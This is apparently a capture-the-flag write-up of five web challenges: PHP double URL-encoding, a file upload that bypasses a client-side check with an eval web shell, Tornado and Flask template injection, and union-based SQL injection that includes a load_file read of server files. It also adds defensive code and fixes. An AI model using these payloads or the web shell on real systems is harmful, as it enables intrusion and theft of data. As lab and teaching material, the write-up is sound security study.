
Web Security Challenges: PHP, SSTI, SQL Injection, and More

Tech | May 17

PHP Vulnerability Exploitation

Intercepting the requests and scanning for backend paths turns up nothing obvious. Published write-ups for the challenge point to .phps files; requesting index.phps returns the script's source:

<?php
// Strict comparison on the value PHP already decoded once when it filled $_GET.
if("admin" === $_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

// A second decode, then a loose comparison against the same string.
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin") {
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

The two comparisons see different strings. PHP decodes the query string once when it fills $_GET, so the strict check "admin" === $_GET[id] runs on the once-decoded value; the script then calls urldecode() itself, so the loose check $_GET[id] == "admin" runs on the twice-decoded value. A value that is not admin after one decode but is admin after two satisfies both.

Percent-encoding admin twice gives %2561%2564%256d%2569%256e: the first decode turns it into %61%64%6d%69%6e, which fails the strict check, and the second turns it into admin. Double-encoding a single character (%2561dmin) is already enough.

The resulting flag is:

cyberpeace{a66b41e93a4251c196c8e734a663f422}

Notes on URL Encoding

URL (percent) encoding writes a byte as % followed by its two hex digits: a is %61, and % itself is %25. Encoding an already-encoded string therefore turns %61 into %2561, which is why two decoding passes are needed to recover the original character.
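As an added example, not part of the original write-up: a Python model of the two decoding stages described above. The helper names (percent_encode_all, double_urlencode, php_check) are this example's own; php_check reproduces the logic of the challenge's index.php on the raw bytes sent in the id parameter.

```python
# Added example (not from the original write-up): simulate the two-stage
# decoding that lets a double-encoded id pass the strict check and still
# match the loose one.
from urllib.parse import quote, unquote_plus


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte, letters included.

    urllib.parse.quote() leaves unreserved characters alone, so it cannot
    turn 'a' into '%61'; this helper writes '%XX' for each UTF-8 byte.
    """
    return "".join("%%%02x" % b for b in s.encode("utf-8"))


def double_urlencode(s: str) -> str:
    """Encode twice: 'a' -> '%61' -> '%2561' (only the '%' changes on pass two)."""
    return quote(percent_encode_all(s), safe="")


def php_check(raw_query_value: str) -> str:
    """Model of the challenge's index.php applied to the raw value of ?id=...

    Stage 1: PHP decodes the query string once when it populates $_GET, so
             the strict === check sees a once-decoded value.
    Stage 2: the script calls urldecode() (which, like unquote_plus, also
             turns '+' into a space) and then does the loose == comparison.
    """
    get_id = unquote_plus(raw_query_value)  # what $_GET[id] holds
    if get_id == "admin":                   # "admin" === $_GET[id]
        return "not allowed!"
    get_id = unquote_plus(get_id)           # urldecode($_GET[id])
    if get_id == "admin":                   # $_GET[id] == "admin"
        return "Access granted!"
    return ""                               # the page prints nothing


if __name__ == "__main__":
    for candidate in ("admin", "%61dmin", "%2561dmin", double_urlencode("admin")):
        print(f"id={candidate!r:36} -> {php_check(candidate)!r}")
```

A single layer of encoding (%61dmin) does not help: the server undoes it before the strict comparison runs. Only the layer that survives the first decode matters.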

.PHPS Files

.phps is the PHP Group's "PHP Source" file type. A server configured to treat the extension as application/x-httpd-php-source (in Apache, AddType application/x-httpd-php-source .phps) returns the syntax-highlighted source instead of executing the script, so a .phps copy left in the web root discloses the application's logic, as it does here.

File Upload Exploitation

The upload form only accepts images, but intercepting the request shows that the file type check is done by a check() function in the page's JavaScript; nothing is re-checked on the server. Deleting that function from the page (or replaying the request with the original filename) lets a PHP web shell named aaa.php through:

<?php
// One-line web shell: eval() runs whatever arrives in the aaa parameter
// (GET, POST or cookie); @ suppresses PHP errors that would reveal it.
@eval($_REQUEST['aaa']);
?>

Connecting to the uploaded aaa.php with AntSword (parameter name aaa) gives a file browser on the server; flag.php in the html directory contains the flag:

cyberpeace{ea8e46f9161212e0a9983fd3794ac7a2}
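As an added example, not part of the original write-up: the server-side validation that the challenge's JavaScript check() never provided. The function, the allowlist and the size limit are this example's assumptions; the rejected inputs in the demo are constructed.

```python
# Added example (not from the original write-up): server-side upload
# validation. A client-side check can be deleted from the page or bypassed
# by replaying the request, so extension, content and the stored name must
# all be decided on the server.
import os
import secrets

ALLOWED_TYPES = {
    # extension -> (MIME type, magic-byte prefixes real files start with)
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
}
MAX_SIZE = 2 * 1024 * 1024  # assumed policy limit: 2 MiB


def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason_or_stored_name)."""
    # 1. Keep only the last path component; reject names without an extension.
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    # 2. Allowlist, not denylist: a denylist misses .phtml, .php5, .phar, ...
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    # 3. Size and content sniffing: the bytes must look like the claimed type.
    if len(content) > MAX_SIZE:
        return False, "file too large"
    _, magics = ALLOWED_TYPES[ext]
    if not content.startswith(magics):
        return False, "content does not match declared image type"
    # 4. Never keep the client's name. A random name with the validated
    #    extension removes aaa.php-style uploads and path tricks at once.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed inputs: the write-up's shell, a renamed shell, a real-looking PNG.
    for name, body in (
        ("aaa.php", b"<?php @eval($_REQUEST['aaa']); ?>"),
        ("shell.php.jpg", b"<?php phpinfo(); ?>"),
        ("../../x.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ):
        print(name, "->", validate_upload(name, body))
```

Magic-byte checks stop a bare PHP file but not a polyglot that starts with GIF89a and continues with PHP, so the stored file must additionally never be executable: store it outside the web root or in a directory where the PHP handler is disabled, and serve it with an explicit image Content-Type.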

SSTI in Tornado Framework

The web interface presents three links:

  • /flag.txt: says the flag is in /fllllllllllllag
  • /welcome.txt: contains the single word render
  • /hints.txt: gives the formula md5(cookie_secret+md5(filename))

Requesting /fllllllllllllag directly returns 404; the hint implies each file has to be requested together with a hash derived from its name and the cookie secret.

The word render in /welcome.txt points at server-side template injection. Passing msg={{999}} in the query string renders as 999, so the parameter is evaluated by Tornado's template engine.

Arithmetic such as msg={{2*3}} is answered with ORZ, so operators are filtered. The payload below needs none: in a Tornado template, handler is the current RequestHandler and handler.settings is the application's settings dictionary, which includes cookie_secret:

{{ handler.settings }}

Given:

  • Cookie secret: df7c68e3-32f2-47e3-b5c2-370bff4bd799
  • MD5 of path: 3bf9f6cf685a6dd8defadabfb41a03a1

Compute:

md5("df7c68e3-32f2-47e3-b5c2-370bff4bd799" + "3bf9f6cf685a6dd8defadabfb41a03a1") = e506787701926864f020c1bf83a57d29
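As an added example, not part of the original write-up: a Python reproduction of the hint's formula, together with a parser for the leaked settings dump. The sample settings string is constructed, and the download path and parameter names used by file_url (/file, filename, filehash) are assumptions of this example, not something the challenge page states.

```python
# Added example (not from the original write-up): compute the per-file hash
# from the hint and read cookie_secret out of a {{ handler.settings }} dump.
import ast
import hashlib
import html
from urllib.parse import urlencode

# Constructed sample of what {{ handler.settings }} renders: Tornado prints
# the settings dict with str(), and its autoescaping turns the quotes into
# &#39; in the raw response body.
SAMPLE_SETTINGS = (
    "{&#39;autoreload&#39;: True, &#39;compiled_template_cache&#39;: False, "
    "&#39;cookie_secret&#39;: &#39;df7c68e3-32f2-47e3-b5c2-370bff4bd799&#39;}"
)


def extract_cookie_secret(rendered: str) -> str:
    """HTML-unescape the leaked dict, parse it safely, return cookie_secret."""
    settings = ast.literal_eval(html.unescape(rendered.strip()))
    return settings["cookie_secret"]


def md5_hex(s: str) -> str:
    """Hex MD5 of a string. The hint hashes the hex digest, not raw digest bytes."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def file_hash(cookie_secret: str, filename: str) -> str:
    """md5(cookie_secret + md5(filename)), exactly as /hints.txt states."""
    return md5_hex(cookie_secret + md5_hex(filename))


def file_url(cookie_secret: str, filename: str, base: str = "/file") -> str:
    """Build the signed request for a file.

    The path and parameter names (/file, filename, filehash) are assumed
    for this example; adjust them to whatever the target actually uses.
    """
    query = urlencode({"filename": filename,
                       "filehash": file_hash(cookie_secret, filename)})
    return f"{base}?{query}"


if __name__ == "__main__":
    secret = extract_cookie_secret(SAMPLE_SETTINGS)
    print(file_url(secret, "/fllllllllllllag"))
```

The order of operations is the usual pitfall: the inner md5 is a 32-character hex string that gets concatenated to the secret as text, so hashing the raw 16 digest bytes instead produces a different, useless value.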

Requesting /fllllllllllllag with this hash returns the flag:

flag{3f39aea39db345769397ae895edb9c70}

Flask SSTI Vulnerability

Requesting / returns the application's own source, because index() reads __file__:

import flask
import os

app = flask.Flask(__name__)

# The flag is moved from the environment into the Flask config object.
app.config['FLAG'] = os.environ.pop('FLAG')

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        # Strip parentheses so nothing can be called, then shadow the
        # template variables config and self with None ahead of the input.
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    # User input is the template itself, not a variable passed to one.
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

A test payload:

http://220.249.52.133:44363/shrine/{{2*10}}

safe_jinja() strips parentheses, so nothing can be called, and shadows the template variables config and self with None. Neither measure closes the path to the configuration: url_for is an ordinary Python function that Flask exposes to every template, its __globals__ attribute is the namespace of the module that defines it, that namespace holds current_app, and .config is an attribute lookup that the shadowed variable name does not affect. No parentheses are needed:

{{url_for.__globals__['current_app'].config}}

Reveals the flag:

flag{shrine_is_good_ssti}
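As an added example, not part of the challenge code: the object graph the bypass payload walks, reproduced in plain Python so it runs without Flask. FakeApp, the module-level current_app, the url_for stub and the FLAG value are constructed stand-ins for flask.Flask, flask.helpers and the real flag; safe_jinja is copied from the challenge source.

```python
# Added example (not from the challenge code): why the blacklist in
# safe_jinja() fails. Jinja2 resolves {{ a.b['c'].d }} with ordinary Python
# attribute and item access, so everything reachable from any object in the
# template namespace is reachable from the template. This module stands in
# for flask.helpers: url_for is a plain function whose __globals__ is the
# module namespace, and that namespace also holds current_app.
from typing import Any


class FakeApp:
    """Minimal stand-in for flask.Flask: only the config mapping matters here."""

    def __init__(self, config: dict):
        self.config = config


# Constructed: in flask.helpers, current_app is imported into the same
# module that defines url_for, so both live in url_for.__globals__.
current_app = FakeApp({"FLAG": "flag{constructed_example}"})


def url_for(endpoint: str, **values: Any) -> str:
    """Plain function, like flask.helpers.url_for; the payload never calls it."""
    return "/" + endpoint


BYPASS_PAYLOAD = "{{url_for.__globals__['current_app'].config}}"


def safe_jinja(s: str) -> str:
    """The challenge's filter, copied verbatim: drop parentheses, shadow two names."""
    s = s.replace('(', '').replace(')', '')
    blacklist = ['config', 'self']
    return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s


def bypass_via_globals(template_fn) -> dict:
    """What Jinja2 does with BYPASS_PAYLOAD: attribute and item access, no calls.

    {% set config=None %} rebinds only the template *variable* named config;
    the .config attribute of the app object is untouched, url_for is not on
    the blacklist, and no parentheses are needed along the way.
    """
    return template_fn.__globals__['current_app'].config


if __name__ == "__main__":
    print(safe_jinja(BYPASS_PAYLOAD))
    print(bypass_via_globals(url_for)["FLAG"])
```

The fix is not a longer blacklist. User input belongs in a fixed template as a variable (render_template('shrine.html', shrine=shrine)), never in the template source; where templates genuinely must be user-authored, jinja2.sandbox.SandboxedEnvironment refuses access to __globals__ and the other function internals this payload relies on.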

SQL Injection in Fakebook

After registering, the profile page is selected by a numeric no parameter in the query string, a natural place to test for SQL injection.

Probing the parameter:

no=4
no=4'
no=4 and 1=1
no=4 and 1=2

The 1=1 and 1=2 variants render differently, so the value reaches the query unquoted. Increasing ORDER BY n until it errors shows the query returns four columns.

A filter blocks union select written with a space between the keywords; an inline comment in place of the space gets past it, and no=-4 empties the original result set so the injected row is what the page displays:

no=-4 union/**/select 1,2,3,4#

Retrieving database name:

no=-4 union/**/select 1,database(),3,4--+

Enumerating schemas:

no=-4 union/**/select 1,group_concat(schema_name) ,3,4 from information_schema.schemata#

Schema list:

fakebook,information_schema,mysql,performance_schema,test 

Checking tables in fakebook:

no=-4 union/**/select 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema="fakebook"#

Table name:

users

Checking columns:

no=-4 union/**/select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#

Columns:

no,username,passwd,data 

The data column holds PHP-serialized objects. Dumping it:

no=-4 union/**/select 1,group_concat(data),3,4 from fakebook.users #

MySQL's load_file() reads files from the database host when the database user holds the FILE privilege and secure_file_priv does not restrict the path. Reading flag.php from the web root:

no=-4 union/**/select 1,load_file("/var/www/html/flag.php"),3,4

Final flag:

flag{c1e552fdf77049fabf65168f22f7aeab}
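As an added example, not part of the original write-up: the union-based extraction above replayed against an in-memory SQLite copy of the fakebook users table, next to the parameterised query that stops it. The table contents are constructed; SQLite has no information_schema, so its catalogue table sqlite_master stands in for information_schema.tables, and load_file() has no SQLite equivalent.

```python
# Added example (not from the original write-up): union-based injection and
# ORDER BY column counting against a constructed SQLite users table, with the
# parameterised lookup that is immune to the same input.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (no INTEGER PRIMARY KEY, username TEXT, passwd TEXT, data TEXT);
INSERT INTO users VALUES (4, 'alice', '5f4dcc3b5aa765d61d8327deb882cf99',
    'O:8:"UserInfo":1:{s:4:"name";s:5:"alice";}');
""")

QUERY = "SELECT no, username, passwd, data FROM users WHERE no="


def vulnerable_lookup(no: str) -> list:
    """String concatenation: the parameter becomes part of the SQL text."""
    return conn.execute(QUERY + no).fetchall()


def safe_lookup(no: str) -> list:
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    return conn.execute(QUERY + "?", (no,)).fetchall()


def count_columns(lookup, no: str = "4", limit: int = 20) -> int:
    """ORDER BY n probing: the largest n the query accepts is the column count."""
    cols = 0
    for n in range(1, limit + 1):
        try:
            lookup(f"{no} order by {n}")
            cols = n
        except sqlite3.OperationalError:  # "ORDER BY term out of range"
            break
    return cols


def dump_tables(lookup) -> str:
    """Same shape as the write-up's payload: -4 empties the real result set,
    /**/ replaces the filtered space, -- comments out the rest of the query."""
    rows = lookup("-4 union/**/select 1,group_concat(name),3,4 from sqlite_master--")
    return rows[0][1] if rows else ""


def dump_data(lookup) -> str:
    """Pull the serialized objects out of the data column via the same union."""
    rows = lookup("-4 union/**/select 1,group_concat(data),3,4 from users--")
    return rows[0][1] if rows else ""


if __name__ == "__main__":
    print("columns:", count_columns(vulnerable_lookup))
    print("tables :", dump_tables(vulnerable_lookup))
    print("data   :", dump_data(vulnerable_lookup))
    print("safe   :", dump_tables(safe_lookup) or "(no rows)")
```

The keyword filter the write-up bypasses is the wrong control: a comment, a newline or a different keyword case all defeat it. With the value bound as a parameter, "-4 union/**/select ..." is simply a string that matches no row.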
